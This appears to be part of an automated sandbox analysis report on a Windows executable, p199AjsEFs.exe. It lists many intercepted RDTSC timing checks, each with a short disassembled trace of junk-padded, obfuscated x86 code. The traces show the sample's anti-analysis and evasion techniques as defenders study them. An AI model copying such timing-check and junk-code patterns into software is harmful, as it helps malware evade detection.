Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B587E0 second address: B587F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FA3F4513F2Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B58945 second address: B58969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E9719Ch 0x00000007 jmp 00007FA3F4E9719Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FA3F4E9719Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B59314 second address: B59319 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B594A9 second address: B594AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B594AF second address: B594B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B594B5 second address: B594D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B594D0 second address: B594E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA3F4513F2Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B597AB second address: B597B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B597B1 second address: B597B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B597B9 second address: B597BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B5BDE2 second address: B5BDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B5BDE7 second address: B5BDFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A1h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B5EFAF second address: B5EFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B5EFB5 second address: B5EFBF instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B62E15 second address: B62E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B62E1C second address: B62E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E9719Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6176E second address: B61783 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA3F4513F2Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B61783 second address: B61788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B63078 second address: B6307C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6307C second address: B63080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B66340 second address: B66349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B66349 second address: B6634D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6634D second address: B66359 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B66359 second address: B66379 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FA3F4E971A4h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B66379 second address: B66396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F32h 0x00000009 jc 00007FA3F4513F26h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69AF6 second address: B69B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FA3F4E971A6h 0x00000013 jmp 00007FA3F4E971A0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69B19 second address: B69C15 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA3F4513F2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push esi 0x0000000f push ebx 0x00000010 jmp 00007FA3F4513F39h 0x00000015 pop ebx 0x00000016 pop esi 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007FA3F4513F38h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jnc 00007FA3F4513F43h 0x00000028 pop eax 0x00000029 mov esi, dword ptr [ebp+122D29F8h] 0x0000002f call 00007FA3F4513F29h 0x00000034 pushad 0x00000035 pushad 0x00000036 jmp 00007FA3F4513F2Ah 0x0000003b push edi 0x0000003c pop edi 0x0000003d popad 0x0000003e pushad 0x0000003f jmp 00007FA3F4513F2Eh 0x00000044 jmp 00007FA3F4513F35h 0x00000049 popad 0x0000004a popad 0x0000004b push eax 0x0000004c jne 00007FA3F4513F32h 0x00000052 mov eax, dword ptr [esp+04h] 0x00000056 jmp 00007FA3F4513F32h 0x0000005b mov eax, dword ptr [eax] 0x0000005d jne 00007FA3F4513F32h 0x00000063 mov dword ptr [esp+04h], eax 0x00000067 push edi 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6A04E second address: B6A052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6A052 second address: B6A056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6A16B second address: B6A175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6AA14 second address: B6AA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6ACFE second address: B6AD02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6AE93 second address: B6AEA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FA3F4513F2Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6AEA8 second address: B6AEEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FA3F4E97196h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FA3F4E97198h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 or dword ptr [ebp+122D198Bh], ebx 0x0000002f push eax 0x00000030 pushad 0x00000031 push edx 0x00000032 ja 00007FA3F4E97196h 0x00000038 pop edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6AEEB second address: B6AEEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6BB73 second address: B6BB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6BB77 second address: B6BB7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6BB7D second address: B6BB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6D6AD second address: B6D6B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA3F4513F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6E1A6 second address: B6E1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6E3D1 second address: B6E3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6E3D7 second address: B6E400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D3176h], ebx 0x0000000f push 00000000h 0x00000011 and si, 488Ch 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D3569h] 0x0000001e mov si, 3255h 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6E400 second address: B6E406 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6E406 second address: B6E40B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6ECF0 second address: B6ECFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA3F4513F26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B71F43 second address: B71FC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3F4E971A1h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FA3F4E97198h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 je 00007FA3F4E9719Ch 0x0000002f mov dword ptr [ebp+122D1F04h], edx 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+12453537h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FA3F4E97198h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 and ebx, 4ADF5E20h 0x0000005f push edx 0x00000060 mov dword ptr [ebp+12452727h], ebx 0x00000066 pop ebx 0x00000067 push eax 0x00000068 push ebx 0x00000069 push eax 0x0000006a push edx 0x0000006b jc 00007FA3F4E97196h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B71FC5 second address: B71FC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B70D67 second address: B70D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B730B5 second address: B730B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B730B9 second address: B730BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B721F2 second address: B7220C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FA3F4513F26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B730BF second address: B730D0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA3F4E97198h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B74150 second address: B741C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jnp 00007FA3F4513F2Ah 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FA3F4513F28h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 jmp 00007FA3F4513F32h 0x0000002d mov dword ptr [ebp+1247B03Ch], esi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FA3F4513F28h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f push 00000000h 0x00000051 mov ebx, dword ptr [ebp+12474141h] 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 jc 00007FA3F4513F2Ch 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B73303 second address: B73309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B741C9 second address: B741D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7433D second address: B74342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B743F7 second address: B743FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B772D5 second address: B772F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7645A second address: B76460 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B772F8 second address: B772FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B772FC second address: B77300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B76460 second address: B76472 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FA3F4E97196h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B76472 second address: B7648A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7648A second address: B7648E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B783E3 second address: B783F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3F4513F2Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A3D6 second address: B7A3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A3DA second address: B7A3EC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3F4513F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B795FB second address: B795FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A3EC second address: B7A3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A3F0 second address: B7A3FA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A3FA second address: B7A400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A400 second address: B7A404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A404 second address: B7A462 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D3B37h], ecx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FA3F4513F28h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov ebx, 31A0E200h 0x00000030 push 00000000h 0x00000032 jp 00007FA3F4513F2Ch 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push edi 0x0000003c jmp 00007FA3F4513F35h 0x00000041 pop edi 0x00000042 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B2B6 second address: B7B2BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B2BB second address: B7B2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B2C1 second address: B7B334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FA3F4E97198h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D3B24h], edx 0x00000028 adc edi, 322314F3h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FA3F4E97198h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a jmp 00007FA3F4E9719Dh 0x0000004f push 00000000h 0x00000051 mov edi, dword ptr [ebp+122D2960h] 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a push ebx 0x0000005b pushad 0x0000005c popad 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B334 second address: B7B33A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7C311 second address: B7C317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B4F5 second address: B7B4F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B4F9 second address: B7B578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e sub ebx, 33EDF63Dh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FA3F4E97198h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 and di, 260Eh 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 xor edi, 2BA02F13h 0x00000047 mov eax, dword ptr [ebp+122D09B5h] 0x0000004d push 00000000h 0x0000004f push eax 0x00000050 call 00007FA3F4E97198h 0x00000055 pop eax 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a add dword ptr [esp+04h], 00000014h 0x00000062 inc eax 0x00000063 push eax 0x00000064 ret 0x00000065 pop eax 0x00000066 ret 0x00000067 mov dword ptr [ebp+122D1E03h], edi 0x0000006d push FFFFFFFFh 0x0000006f sub edi, 0953BBE1h 0x00000075 nop 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B578 second address: B7B592 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA3F4513F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FA3F4513F28h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B592 second address: B7B598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
